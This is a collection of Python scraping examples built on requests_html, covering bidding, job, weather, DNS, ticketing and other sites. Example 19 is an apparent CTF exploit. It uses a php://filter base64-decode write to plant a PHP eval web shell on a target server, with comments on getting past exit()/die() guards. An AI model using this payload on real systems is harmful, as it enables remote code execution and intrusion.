                'background:url(', 'https:').replace(') no-repeat;', '')
            houseId = house_id[index]
            descText = desc_text[index].strip().replace("\n", "")
            print(id, nickname)
            if nickname == anchor_name:
                anchorId = id
                self.save_data(id, nickname, fansCount, anchorPhoto, houseId,
                               descText)
                break
            else:
                anchorId = None
                # self.save_data(id, nickname, fansCount, anchorPhoto, houseId, descText)

        print(anchorId)
        return anchorId
Example No. 13
class Bidding:
    def __init__(self, url, page):
        self.url = url
        self.loginurl = self.url + '/cblcn/member.login/login'
        self.yzmurl = self.url + '/cblcn/member.login/captcha'
        self.loginchkurl = self.url + '/cblcn/member.login/logincheck'
        self.page = page
        self.key_title1 = '风电'
        self.key_title2 = '风力'
        self.key_content = '风力发电机组'
        self.exp_list = [
            '询价', '施工', '维修', '维护', '运维', '改造', '接地', '海缆',
            '改建', '中标', '塔筒', '塔架', '基础', '法兰', '锚栓', '压站',
            '主轴', '主变', '箱变', '勘察', '设计', '滤芯', '螺栓', '电气',
            '线路', '道路', '监理', '备件', '吊装', '可研', '润滑', '配电',
            '装置', '检测', '检修', '监测', '监督', '测试', '测评', '试验',
            '变更', '更换', '技改', '验收', '安装', '分包', '电缆', '光缆',
            '材料', '箱式', '框架', '造价', '通信', '编码', '定检', '叶片',
            '倒运', '消防', '开关', '主体', '集控', '诊断', '齿轮', '柴油',
            '部件', '电池', '风扇', '充电', '故障', '消缺', '外委', '水土',
            '电容', '稳控', '变桨', '滑环', '打捆', '咨询', '测风', '电压',
            '电源', '电阻', '电梯', '模块', '网关', '数据', '驱动', '配件',
            '刹车', '升降', '防尘', '评估', '档案', '监控', '偏航', '标识',
            '土建', '振动', '仿真', '通讯', '液压', '雷电', '租赁', '端子',
            '紫铜', '蓄能', '加热', '控制', '接口', '导流', '变频', '工控',
            '继电器', '风速仪', '熔断器', '交换机', '集电环', '联轴器',
            '变压器', '变流器', '可行性', '启动', '滤网', '补偿', '二次',
            'GIS', 'SVG', '加密', '除湿', '寻甸', '元谋', '风向', '运输']  # 电机 (motor)
        self.sel_title = 'tbody tr td a'
        self.sel_content = 'div.xq_nr'
        self.sel_pubdate = 'div.xiab_1 > span'
        self.session = HTMLSession()  # session object; it stores cookies automatically
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) '
            'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 '
            'Safari/537.36',
            'referer': 'https://www.chinabidding.cn/',
            }
        self.data = {}
        self.t = time.time()
        self.stamp = str(round(self.t * 1000))  # millisecond timestamp
        self.now = time.strftime('%Y-%m-%d', time.localtime(self.t))  # today's date

    def get_response(self, url):
        r = self.session.get(url, params=self.data, headers=self.headers)
        return r

    def chk_login(self):
        response = self.get_response(self.loginurl)  # load the login page that carries the captcha token
        userid = response.html.find('div.deng_nr_1 > input',
                                    first=True).attrs['value']
        self.data = {
            't': self.stamp,
            'randomID': userid
        }
        yzmpic = self.get_response(self.yzmurl)  # fetch the captcha image and save it
        with open('captcha.jpg', 'wb') as f:
            f.write(yzmpic.content)

        os.system('start captcha.jpg')  # open the captcha image (Windows)
        yzm = input('输入验证码:')
        logindata = {
            'name': '联合动力',
            'password': '******',
            'url': '',
            'yzm': yzm,
            'randomID': userid,
        }
        rep = self.session.post(self.loginchkurl, data=logindata,
                                headers=self.headers)
        # print(rep, rep.text)
        # response = self.session.post(self.loginurl, data=logindata,
        #                              headers=self.headers)
        # print(response.text)  # 登录成功自动跳转到首页
        if rep.text == '5':
            print('登录失败')
            return False
        else:
            print('登录成功')
            return True

    def get_result(self):
        start = time.time()
        if self.chk_login():  # fetch the captcha, show it, read the code and log in
            for i in range(1, self.page):
                searchurl = self.url + '/search/searchgj/zbcg'
                self.data = {
                    'areaid': '',
                    'keywords': '风电',
                    'time_start': self.now,
                    'time_end': self.now,
                    'page': i,
                    'search_type': 'CONTEXT',
                    'categoryid': '',
                    'rp': '30',
                    'table_type': '',
                    'b_date': 'week',
                }
                response = self.get_response(searchurl)
                item_list = response.html.find(self.sel_title)
                # print(item_list)
                for item in item_list:
                    try:
                        href = self.url + item.attrs['href']
                        title = item.attrs['title']
                    except Exception:
                        continue
                    # title = item.text
                    # print(title)
                    if self.chk_title(title):  # skip titles that contain an excluded keyword
                        if self.key_title1 in title or self.key_title2 \
                           in title:
                            response = self.get_response(href)
                            try:
                                content = response.html.find(
                                    self.sel_content, first=True).text
                                pubdate = response.html.find(
                                    self.sel_pubdate, first=True).text
                            except Exception:
                                continue
                            # print(content)
                            if self.key_content in content:
                                webbrowser.open(href)
                                print(href, pubdate, title)
                time.sleep(1)
        end = time.time() - start
        print('耗时:%.2f秒' % end)
        print(time.strftime("%H:%M:%S"))  # 当前时间

    def chk_title(self, title):
        for word in self.exp_list:
            if word in title:
                # print(word)
                return False
        # print(title)
        return True
Example No. 14
"""
Attempt at web scraping Piazza.
This does not work, because Piazza uses JavaScript to retrieve post data.
"""

# session = requests.Session()
# s = session.post("https://piazza.com/class", data=userdata.data, cookies=userdata.cookies)

# url = "https://piazza.com/class/kea8ntdsn097ev?cid=1494"
# s = session.get(url)
# soup = BeautifulSoup(s.content, "html.parser")
# print(soup.get_text())

session = HTMLSession()

r = session.get("https://piazza.com/")
r = session.post("https://piazza.com/class", data=userdata.data)
page = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1")
page.html.render()
soup = BeautifulSoup(page.html.html, "html.parser")  # page.html is an HTML object; pass its markup string
print(soup.get_text())

# data = '{"method":"content.get","params":{"cid":"khksgq944s2172","nid":"kek9zeb4r1g3ir","student_view":false}}'
# r = session.post('https://piazza.com/logic/api', data=userdata.data)
# soup = BeautifulSoup(r.html, "html.parser")
# print(soup.get_text())

# r = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1494")

# soup = BeautifulSoup(r.html.text, "html.parser")

# url = "https://piazza.com/class/kea8ntdsn097ev?cid=1"
Example No. 15
payload = {
    "staff_username": USER,
    "staff_password": PASSWORD,
}

headers = {
    "User-Agent":
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
}

# 0) GET - login - https://www.campingshop.pl/panel/auth/login
# LOGIN_WEBSITE: http://www.campingshop.pl/panel/auth/login
r = sess.get(LOGIN_WEBSITE, headers=headers)

# 1) POST - login - https://www.campingshop.pl/panel/auth/login with staff_username and staff_password
r = sess.post(LOGIN_WEBSITE, data=payload, headers=headers)
# I wanted to pass send_cookies_session=True here, but I get
# TypeError: render() got an unexpected keyword argument 'send_cookies_session',
# even though 'send_cookies_session' is in the docs: https://requests.readthedocs.io/projects/requests-html/en/latest/
r.html.render()
print(r.cookies.get_dict())  # no cookies ;(

# 2) GET - panel - https://www.campingshop.pl/panel
r = sess.get("https://www.campingshop.pl/panel", headers=headers)

# 3) GET - login - https://www.campingshop.pl/panel2/login
r = sess.get("https://www.campingshop.pl/panel2/login", headers=headers)

r.html.render()
print(r.cookies.get_dict())  # no cookies ;(

# To be completed
Example No. 16
    def search(self) -> list:
        """
        Performs actual scraping

        :return: list with resulting positions
        """

        post_data = {
            "_piref37_267288_37_267287_267287.next_page": "/vmsearch.do",
            "_piref37_267288_37_267287_267287.formtype": 3,
            "_piref37_267288_37_267287_267287.vmid": "",
            "_piref37_267288_37_267287_267287.nprokoho": "",
            "_piref37_267288_37_267287_267287.ndny": "",
            "_piref37_267288_37_267287_267287.nokres": "",
            "_piref37_267288_37_267287_267287.nsort": "",
            "_piref37_267288_37_267287_267287.ref": [],
            "_piref37_267288_37_267287_267287.kiosek": 0,
            "_piref37_267288_37_267287_267287.send": 'A',
            "_piref37_267288_37_267287_267287.ok": "Search",
            "_piref37_267288_37_267287_267287.profese": [self.profession], # 'developer'
            "_piref37_267288_37_267287_267287.obor": "",
            "_piref37_267288_37_267287_267287.dopravaObec": "",
            "_piref37_267288_37_267287_267287.firma": "",
            "_piref37_267288_37_267287_267287.ico": "",
            "_piref37_267288_37_267287_267287.okres": self.district_code,
            "_piref37_267288_37_267287_267287.zaDny": "",
            "_piref37_267288_37_267287_267287.mzdaOd": "",
            "_piref37_267288_37_267287_267287.typMzdy": 'M',
            "_piref37_267288_37_267287_267287.sort": 2
        }

        cleanr = re.compile(r'<.*?>')

        session = HTMLSession()
        response = session.post(self.url, data=post_data)
        tree = html.fromstring(response.text)
        position_elements = tree.cssselect('table.OKtbodyThDistinct tbody')
        for position_element in position_elements:
            # get details from lines using regex match
            position = {}
            occupation = position_element.cssselect('h4.vmProfese')[0].text
            position['occupation'] = occupation

            info_lines = position_element.cssselect('tr')

            for info_line in info_lines:
                if('Company' in str(html.tostring(info_line))):
                    company_list = info_line.cssselect('b')
                    company = ''
                    if (len(company_list)):
                        company = company_list[0].text
                        position['company'] = company
                elif('Report to' in str(html.tostring(info_line))):
                    reportto_element = info_line.cssselect('td')[2]
                    reportto_str = str(html.tostring(reportto_element, encoding='unicode'))
                    report_to = re.sub(cleanr, '', reportto_str)
                    position['report_to'] = report_to
                elif('Comment on vacancy:' in str(html.tostring(info_line))):
                    description_element = info_line.cssselect('td')[0]
                    description_str = str(html.tostring(description_element, encoding='unicode'))
                    description = re.sub(cleanr, '', description_str)
                    position['description'] = description

            # print(f'company: {company}')
            # print(company.text)
            self.positions.append(position)

        # print(self.positions)
        return self.positions
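The search() method comes from a scraper class whose constructor is not shown; judging by the attributes it uses (self.url, self.profession, self.district_code, self.positions), a plausible skeleton looks like this (every name apart from those attributes is an assumption):

class VacancyScraper:  # hypothetical class name
    def __init__(self, url, profession, district_code):
        self.url = url                      # search endpoint that receives post_data
        self.profession = profession        # e.g. 'developer'
        self.district_code = district_code  # district filter used in the form
        self.positions = []                 # filled in by search()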
Example No. 17
from requests_html import HTMLSession
import json

session = HTMLSession()
r = session.get("https://cervezapedia.com/beer/rate")
token = r.cookies["XSRF-TOKEN"]
print(token)
r = session.post("https://cervezapedia.com/beer/rate",
                 headers={"X-XSRF-TOKEN": token})

datos = json.loads(r.content)

#print(datos)

for cerveza in datos["data"]:
    print("-------------------------------------------------------")
    print("Código:", cerveza['externalId'], "Nombre:", cerveza['name'])

    r = session.post("https://cervezapedia.com/beer/byId",
                     headers={"X-XSRF-TOKEN": token},
                     json={"id": cerveza['externalId']})
    datos_cerveza = json.loads(r.content)["data"]
    #print(datos_cerveza)
    print("Pais: ", datos_cerveza["countrySpanishName"])
    print("Alcohol: ", datos_cerveza["alcohol"])
    print("Estilo: ", datos_cerveza["styleName"])
Example No. 18
def check_pages(vk, config):
    # log in
    url = 'https://catwar.su/ajax/login'
    user_agent_val = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \
                     'Chrome/90.0.4430.93 Safari/537.36 '
    session = HTMLSession()
    session.headers.update({'Referer': url})
    session.headers.update({'User-Agent': user_agent_val})
    session.post(url, {**catwar})

    heads = ('врачеватель', 'врачевательница', 'ученик врачевателя', 'ученица врачевателя', 'советник', 'советница')
    elders = ('старейшина',)  # trailing comma so this is a tuple like the others
    elects = ('избранник духов', 'избранница духов')
    guards = ('страж', 'стражница')
    hunters = ('охотник', 'охотница')
    futures = ('будущий охотник', 'будущая охотница', 'будущий страж', 'будущая стражница')
    others = ('котёнок', 'переходящий', 'переходящая')
    page_ids = {heads: 56490990, elders: 56591896, elects: 56846221,  guards: 56807806,
                hunters: 56807807, futures: 56490171, others: 56808867}
    wrong_names, dels, not_position = [], [], []
    m_1, m_2, m_3 = '', '', ''

    for key, value in page_ids.items():
        # fetch the page source
        orig_page = vk_token.pages.get(**config, owner_id=-group_id, page_id=value, need_source=1)
        orig_page = orig_page['source']
        page = orig_page[(orig_page.find("{|") + 2):(orig_page.find("|}"))]

        vk_ids = re.findall("id[0-9]+", page)
        i = 0
        while i < len(vk_ids):
            vk_ids[i] = vk_ids[i][2:]
            i += 1

        vk_names = re.findall(r"\|[^ -][^0-9\]\]\[]+", page)
        i = 0
        while i < len(vk_names):
            vk_names[i] = vk_names[i][1:]
            i += 1

        vk_dict = dict(zip(vk_ids, vk_names))

        ids = re.findall(r"\|[0-9]+", page)
        i = 0
        while i < len(ids):
            ids[i] = ids[i][1:]
            i += 1

        names = re.findall(r"\[[А-яё ]+", page)
        i = 0
        while i < len(names):
            names[i] = names[i][1:]
            i += 1

        # check the VK display names
        for vk_key, vk_value in vk_dict.items():
            vk_name = vk.users.get(user_ids=vk_key, fields='first_name, last_name')[0]
            vk_name = vk_name['first_name'] + ' ' + vk_name['last_name']
            if vk_value != vk_name:
                wrong_names.append(f'{vk_value} — {vk_name}')

        # check clan membership and position
        for id in ids:
            response = session.get(f'https://catwar.su/cat{id}')
            profile = response.content.decode("utf-8")
            soup = BeautifulSoup(profile, 'html.parser')
            position = soup.find('i')
            if not position:
                if id not in ('539719', '1068731'):  # ids are strings here; these two are exempt
                    dels.append(f'{key[0]} — {id}')
            else:
                position = position.text
                position = re.match('[^i<>/]+', position).group()
                if position.lower() not in key:
                    not_position.append(f'{id} не {key[0]}, a {position}')

    for x in dels:
        m_1 = m_1 + x + '\n'
    for x in not_position:
        m_2 = m_2 + x + '\n'
    for x in wrong_names:
        m_3 = m_3 + x + '\n'

    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Удалены или не в клане: {m_1}\n\n'
                     )
    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Другие должности: {m_2}\n\n'
                     )
    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Другие имена: {m_3}\n\n',
                     )
Example No. 19
# https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/
import pprint
from requests_html import HTMLSession

url = 'http://www.cduestc.cn:50007/'
params = {"file": 'php://filter/write=convert.base%364-decode/resource=aa.php'}
data = {
    # <?php @eval($_POST['cmd']) ?> 写到aa.php
    # <?php exit(); 前面加1个a
    # <?php die(); 前面加2个aa
    'contents': 'aaPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4='
}
# proxies = {'http': 'http://localhost:8080'}
proxies = {}

s = HTMLSession()
res = s.post(url, params=params, data=data, proxies=proxies)
pprint.pprint(res.text)
Example No. 20
class LostFilmParser:
    source_url = 'https://www.lostfilm.tv/'
    tv_shows_list_part_url = 'https://www.lostfilm.tv/ajaxik.php'
    part_step = 10

    def __init__(self):
        self.session = HTMLSession()
        self.news_data = self.session.get(self.source_url)

    def get_links(self):
        return self.news_data.html.links

    def get_title_en(self, href):
        try:
            result = search(r'/series/([^/]+)/', href)
            title_en = result.group(1)
            tv_show_link = self.source_url.rstrip('/') + result.group()
        except AttributeError:
            title_en = None
            tv_show_link = None
        return title_en, tv_show_link

    def get_new_shows_episodes(self):
        clear_data = []
        news_block = self.news_data.html.find('.new-movies-block', first=True)
        movies = news_block.find('a.new-movie')
        for movie in movies:
            title_en, show_link = self.get_title_en(movie.attrs['href'])
            clear_data.append(
                {
                    'title_ru': movie.attrs['title'],
                    'title_en': title_en,
                    'jpg': 'http:' + movie.find('img', first=True).attrs['src'],
                    'season': movie.find('.title', first=True).text,
                    'date': movie.find('.date', first=True).text,
                    'episode_link': self.source_url.rstrip('/') + movie.attrs['href'],
                    'tv_show_link': show_link,
                }
            )
        return clear_data

    def load_part_list(self, step):
        url = self.source_url + 'ajaxik.php'
        request_data = self.session.post(
            url=url,
            data={'act': 'serial', 'o': step, 's': 3, 't': 0, 'type': 'search'}
            )
        return json.loads(request_data.content)['data']

    def get_tv_shows_list(self):
        """10->20->30-> пока не вернет пустой список"""
        step = 0
        shows_list = []
        request_result = self.load_part_list(step)
        while request_result:
            for result in request_result:
                shows_list.append(result)
            step += self.part_step
            sleep(1)
            request_result = self.load_part_list(step)
        return shows_list
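A hypothetical driver for the parser above; nothing here comes from the original repo, the names simply follow the class as defined.

if __name__ == '__main__':
    parser = LostFilmParser()
    # latest episodes from the front page
    for episode in parser.get_new_shows_episodes():
        print(episode['date'], episode['title_ru'], episode['episode_link'])
    # full catalogue, paged 10 at a time via ajaxik.php
    shows = parser.get_tv_shows_list()
    print(len(shows), 'shows total')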
Exemplo n.º 21
0
class Grabber:
    def __init__(self, d, f, t, p):
        self.date = d
        self.from_ = f
        self.to = t
        self.purpose_code = p
        self.s = HTMLSession()
        self.s.cookies = self.init_cookie()
        self.uuid = ''
        self.ticket = {}

    def init_cookie(self):
        cookie_jar = RequestsCookieJar()
        cookie_jar.set("route", "c5c62a339e7744272a54643b3be5bf64", domain="/")
        cookie_jar.set("JSESSIONID",
                       "772931B953A48C762D39F27832447D2F",
                       domain="/otn")
        cookie_jar.set("BIGipServerotn", "217055754.38945.0000", domain="/")
        return cookie_jar

    def check_ticket_info(self):
        def crawl_ticket_info():
            url = (
                f'https://kyfw.12306.cn/otn/leftTicket/queryZ?'
                f'leftTicketDTO.train_date={self.date}'
                f'&leftTicketDTO.from_station={self.from_}'
                f'&leftTicketDTO.to_station={self.to}&purpose_codes={self.purpose_code}'
            )
            r = self.s.get(url)
            tickets = []
            for line in r.json()['data']['result']:
                ls = line.split('|')
                if ls[0]:
                    tickets.append({
                        'secretstr': ls[0],
                        'train_num': ls[3],
                        'train_date': ls[13],
                        'start_at': ls[8],
                        'arrive_at': ls[9],
                        'seat_level_0': ls[32],
                        'seat_level_1': ls[31],
                        'seat_level_2': ls[30],
                        'sleeper_level_0': ls[21],
                        'sleeper_level_1': ls[23],
                        'motor_sleeper': ls[33],
                        'sleeper_level_2': ls[28],
                        'soft_seat': ls[27],
                        'hard_seat': ls[29],
                        'no_seat': ls[26]
                    })
            return tickets

        tickets = crawl_ticket_info()
        if not tickets:
            return
        for ticket in tickets:
            if ticket['train_num'] == 'G1002':
                self.order_ticket(ticket)
                return

    def submit_order_request(self, ticket):
        url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'
        data = {
            'secretStr':
            urllib.parse.unquote(ticket['secretstr']),
            'train_date':
            dt.datetime.strptime(ticket['train_date'],
                                 '%Y%m%d').strftime('%Y-%m-%d'),
            'back_train_date':
            dt.datetime.today().strftime('%Y-%m-%d'),
            'tour_flag':
            'dc',
            'purpose_codes':
            self.purpose_code,
            'query_from_station_name':
            sd[self.from_],
            'query_to_station_name':
            sd[self.to],
            'undefined':
            ''
        }
        r = self.s.post(url, data=data)

    def get_data(self):
        def parse_pts(html):
            tds = html.xpath('//tbody[@id="check_ticketInfo_id"]/tr/td')
            return f'0,0,1,{tds[3].text},1,{tds[5].text},{tds[6].text},N', f'{tds[3].text},1,{tds[5].text},1_'

        url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
        headers = {
            'Referer':
            'https://kyfw.12306.cn/otn/leftTicket/init?linktypeid=dc',
            'Host': 'kyfw.12306.cn',
            'Origin': 'https://kyfw.12306.cn',
            'User-Agent':
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        r = self.s.post(url, data={'_json_att': ''}, headers=headers)
        r.html.render(timeout=6, wait=6)
        # print(r.text)
        # TODO: optimize
        rt = r.text
        print(rt)
        html = lxml.etree.HTML(rt)
        passenger_ticket_str, old_passenger_str = parse_pts(html)

        return {
            'REPEAT_SUBMIT_TOKEN':
            re.findall(r'var globalRepeatSubmitToken = \'(.*)\';', rt)[0],
            'key_check_isChange':
            re.findall(r'\'key_check_isChange\':\'(.*)\',', rt)[0],
            'leftTicketStr':
            re.findall(r'\'leftTicketStr\':\'(.*)\',', rt)[0],
            '_json_att':
            '',
            'dwAll':
            'N',
            'roomType':
            '00',
            'whatsSelect':
            '1',
            'seatDetailType':
            '000',
            'choose_seats':
            '',  # TODO: choose seat.
            'train_location':
            'QX',  # can't understand what this value means.
            'purpose_codes':
            '00',
            'randCode':
            '',
            'passengerTicketStr':
            passenger_ticket_str,
            'oldPassengerStr':
            old_passenger_str,
        }

    def order_ticket(self, ticket):
        self.submit_order_request(ticket)
        # checkuser
        data = self.get_data()
        url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue'
        r = self.s.post(url, data=data)
        try:
            if r.status_code == 200:
                print('got !')
        except:
            import traceback
            traceback.print_exc()

    def show_qr_code(self):
        """Show qrcode for login."""
        url = 'https://kyfw.12306.cn/otn/resources/login.html'
        self.s.get(url)
        rjs = self.s.post('https://kyfw.12306.cn/passport/web/create-qr64',
                          data={
                              'appid': 'otn'
                          }).json()
        self.uuid = rjs['uuid']
        b64img = rjs['image']
        img = Image.open(BytesIO(base64.b64decode(b64img)))
        img.show()

    def check_qr_code(self):
        rjs = self.s.post('https://kyfw.12306.cn/passport/web/checkqr',
                          data={
                              'appid': 'otn',
                              'uuid': self.uuid
                          }).json()
        return rjs['result_code'] != '2'

    def login(self):
        threading.Thread(target=self.show_qr_code).start()
        while self.check_qr_code():
            time.sleep(2)
        print('login success.')
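A hypothetical driver for the Grabber above; the date, station telecodes and purpose code are placeholders, and the station-name dict sd that the class relies on must be provided elsewhere.

if __name__ == '__main__':
    grabber = Grabber('2019-02-01', 'BJP', 'SHH', 'ADULT')
    grabber.login()              # blocks until the displayed QR code is scanned
    grabber.check_ticket_info()  # queries tickets and tries to order train G1002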
Exemplo n.º 22
0
class ScrapperINMET:
    def __init__(self):

        env_path = os.path.join(os.path.dirname(__file__), '..', 'env.ini')
        env_config = configparser.ConfigParser()
        env_config.read(env_path)
        self.user = env_config.get('login', 'user')
        self.password = env_config.get('login', 'password')

        self.base_url = "http://www.inmet.gov.br"
        self.session = HTMLSession(mock_browser=True)

    @staticmethod
    def is_logged_in(response: Response) -> bool:
        return 'Modulo de Estudo e Pesquisa' in response.text

    def login(self) -> bool:
        url = '/'.join([self.base_url, "projetos/rede/pesquisa/inicio.php"])
        self.session.get(url)

        payload = {
            'mUsuario': '',
            'mSenha': self.password,
            'mCod': self.user,
            'mGerModulo': 'PES',
            'btnProcesso': ' Acessar '
        }

        response = self.session.post(url, data=payload)
        response.raise_for_status()
        return self.is_logged_in(response)

    def get_dados(self, tipo_periodo: str, uf: str, cidade: str,
                  dtInicio: datetime.datetime, dtFim: datetime.datetime):

        self.login()

        if tipo_periodo == 'mes':
            url = '/'.join([
                self.base_url, "projetos/rede/pesquisa/form_mapas_mensal.php"
            ])
            url_post = '/'.join(
                [self.base_url, "projetos/rede/pesquisa/mapas_mensal_sem.php"])

        elif tipo_periodo == 'dia':
            url = '/'.join([
                self.base_url, "projetos/rede/pesquisa/form_mapas_c_diario.php"
            ])
            url_post = '/'.join(
                [self.base_url, "projetos/rede/pesquisa/mapas_c_diario.php"])
        else:
            raise NotImplementedError

        self.session.get(url)

        payload = {
            'mUsuario': self.user,
            'mRelRegiao': '',
            'mRelEstado': uf.upper(),
            'mRelDtInicio': dtInicio.strftime('%d/%m/%Y'),
            'mRelDtFim': dtFim.strftime('%d/%m/%Y'),
            'mGerModulo': 'PES',
            'mOpcaoAtrib15': '1',
            'btnProcesso': ' Pesquisa '
        }

        response = self.session.post(url_post, data=payload)
        pattern = cidade + r'.*href=([^>]+) target'
        url_result = re.search(pattern, response.text,
                               flags=re.IGNORECASE).group(1)
        response = self.session.get(url_result)
        rtext = response.html.xpath('.//pre')[0].full_text
        dados = re.search('(estacao;.+)', rtext,
                          re.IGNORECASE | re.DOTALL).group(1)

        dados = dados.split('\n')
        head = dados[0].split(';')
        dados.pop(0)
        result = list()
        for dado in dados:
            values = dado.split(';')
            if len(values) != len(head):
                continue
            temp = dict()
            for k, v in zip(head, values):
                if k + v == "":
                    continue
                temp[k] = v
            result.append(temp)
        return result
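A hypothetical call to the scrapper above; the UF, city and date values are placeholders, and env.ini next to the package is assumed to hold the [login] credentials.

import datetime

scrapper = ScrapperINMET()
dados = scrapper.get_dados(tipo_periodo='dia', uf='RS', cidade='PORTO ALEGRE',
                           dtInicio=datetime.datetime(2019, 1, 1),
                           dtFim=datetime.datetime(2019, 1, 31))
print(len(dados), 'rows')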
Exemplo n.º 23
0
class GratisDNS(object):
    BACKEND_URL = 'https://admin.gratisdns.com/'
    SUPPORTED_RECORDS = ('A', 'AAAA', 'CNAME', 'MX', 'TXT', 'SRV')

    def __init__(self, username: str, password: str):
        self.__session = HTMLSession()

        payload = {
            'action': 'logmein',
            'login': username,
            'password': password
        }
        response = self.__session.post(GratisDNS.BACKEND_URL,
                                       data=payload,
                                       allow_redirects=False)

        if response.status_code != requests.codes.found:
            # Unfortunately, GratisDNS doesn't use proper HTTP status
            # codes, but it does redirect on successful login, so
            # assume anything else is an error.
            raise GratisDNSError(
                'Login response was not redirect. Possibly invalid username/password'
            )

    def __get_domains(self, action: str, table_id: str) -> list:
        domains = []
        response = self.__session.get(GratisDNS.BACKEND_URL,
                                      params={'action': action})
        table = response.html.find(table_id, first=True)
        for domain in table.find('tr'):
            domain_change_link = domain.find('a',
                                             containing='Ændre',
                                             first=True)
            if domain_change_link:
                href = domain_change_link.attrs['href']
                query = parse_qs(urlparse(href).query)
                domains.append(query['user_domain'][0])
        return domains

    def __record_from_dict(self, record_type: str,
                           record_entries: dict) -> Record:
        if record_type == 'A':
            return ARecord(record_entries.get('user_domain'),
                           record_entries['Hostname'],
                           record_entries['IPv4'],
                           id=record_entries.get('id'),
                           ttl=record_entries['TTL'])

        elif record_type == 'AAAA':
            return AAAARecord(record_entries.get('user_domain'),
                              record_entries['Hostname'],
                              record_entries['IPv6'],
                              id=record_entries.get('id'),
                              ttl=record_entries['TTL'])

        elif record_type == 'CNAME':
            raise NotImplementedError()

        elif record_type == 'MX':
            return MXRecord(record_entries.get('user_domain'),
                            record_entries['Hostname'],
                            record_entries['Exchanger'],
                            record_entries['Preference'],
                            id=record_entries.get('id'),
                            ttl=record_entries['TTL'])

        elif record_type == 'TXT':
            return TXTRecord(record_entries.get('user_domain'),
                             record_entries['Hostname'],
                             record_entries['Text'],
                             id=record_entries.get('id'),
                             ttl=record_entries['TTL'])

        elif record_type == 'SRV':
            raise NotImplementedError()

        raise NotImplementedError()

    def __record_change_query_from_column(self, column) -> dict:
        record_change_link = column.find('a', containing='Ændre', first=True)
        if record_change_link:
            href = record_change_link.attrs['href']
            query = parse_qs(urlparse(href).query)
            return {k: v[0] for k, v in query.items()}
        return {}

    def __get_records(self, html: HTML) -> dict:
        records = {}
        for entry in html.find('.dns-records'):
            record_type = entry.find('h2', first=True).element.text.strip()
            if record_type not in self.SUPPORTED_RECORDS:
                continue
            table = entry.find('table', first=True)
            headers = [
                h.text for h in table.find('thead', first=True).find(
                    'tr', first=True).find('th')
            ]
            record_entries = []
            for row in table.find('tbody', first=True).find('tr'):
                cols = row.find('td')
                entry = {}
                for i, h in enumerate(headers):
                    column = cols[i]
                    if h:
                        entry[h] = column.text
                    else:
                        record_change_link_query = self.__record_change_query_from_column(
                            column)
                        if record_change_link_query:
                            entry['id'] = record_change_link_query['id']
                            entry['user_domain'] = record_change_link_query[
                                'user_domain']
                if entry:
                    record_entries.append(
                        self.__record_from_dict(record_type, entry))
            if record_entries:
                records[record_type] = record_entries
        return records

    def create_record(self,
                      domain,
                      host,
                      type,
                      data,
                      preference=None,
                      weight=None,
                      port=None):
        raise NotImplementedError()

    def update_record(self, record: Record):
        if record.record_type not in self.SUPPORTED_RECORDS:
            raise NotImplementedError()

        form_data = vars(record)
        form_data[
            'action'] = f'dns_primary_record_update_{record.record_type.lower()}'
        self.__session.post(GratisDNS.BACKEND_URL, data=form_data)

    def delete_record(self, domain, host, type=None, preference=None):
        raise NotImplementedError()

    def get_primary_domains(self):
        return self.__get_domains('dns_primarydns', '#primarydnslist')

    def get_secondary_domains(self):
        return self.__get_domains('dns_secondarydns', '#secondarydnslist')

    def get_primary_domain_details(self, domain: str):
        response = self.__session.get(GratisDNS.BACKEND_URL,
                                      params={
                                          'action':
                                          'dns_primary_changeDNSsetup',
                                          'user_domain': domain
                                      })
        return self.__get_records(response.html)

    def create_primary_domain(self, domain):
        raise NotImplementedError()

    def create_secondary_domain(self, domain, master, slave='xxx.xxx.xxx.xxx'):
        raise NotImplementedError()

    def delete_primary_domain(self, domain):
        raise NotImplementedError()

    def delete_secondary_domain(self, domain):
        raise NotImplementedError()

    def import_from_axfr(self, domain, slave='127.0.0.1'):
        raise NotImplementedError()
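A hypothetical session with the client above; the credentials are placeholders.

dns = GratisDNS('user@example.com', 'secret')
for domain in dns.get_primary_domains():
    records = dns.get_primary_domain_details(domain)
    print(domain, {rtype: len(entries) for rtype, entries in records.items()})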
Exemplo n.º 24
0
def start(data):
    session = HTMLSession()
    url = "https://parivahan.gov.in/rcdlstatus/?pur_cd=101"
    res = session.get(url)

    # ----------------FORM EXTRACTION----------------

    soup = BeautifulSoup(res.html.html, "html.parser")
    details = {}

    form = soup.find_all("form")[0]
    action = form.attrs.get("action").lower()
    method = form.attrs.get("method", "get").lower()
    inputs = []

    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        input_value = input_tag.attrs.get("value", "")
        inputs.append({
            "type": input_type,
            "name": input_name,
            "value": input_value
        })

    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs

    # -------------------Captcha---------------------
    captcha_src = soup.find_all("img")
    for i in captcha_src:
        if "Captcha" in i['src']:
            captcha_url = "https://parivahan.gov.in/" + i['src']

    # Currently the captcha is entered manually by the user after visiting the link
    print(captcha_url)
    # -------------------FORM FILLING-----------------

    data['form_rcdl:j_idt32:CaptchaID'] = input("Enter Captcha: ")

    submit_url = urljoin(url, details["action"])
    #print(submit_url)

    if details["method"] == "post":
        res = session.post(submit_url, data=data)
        # return res
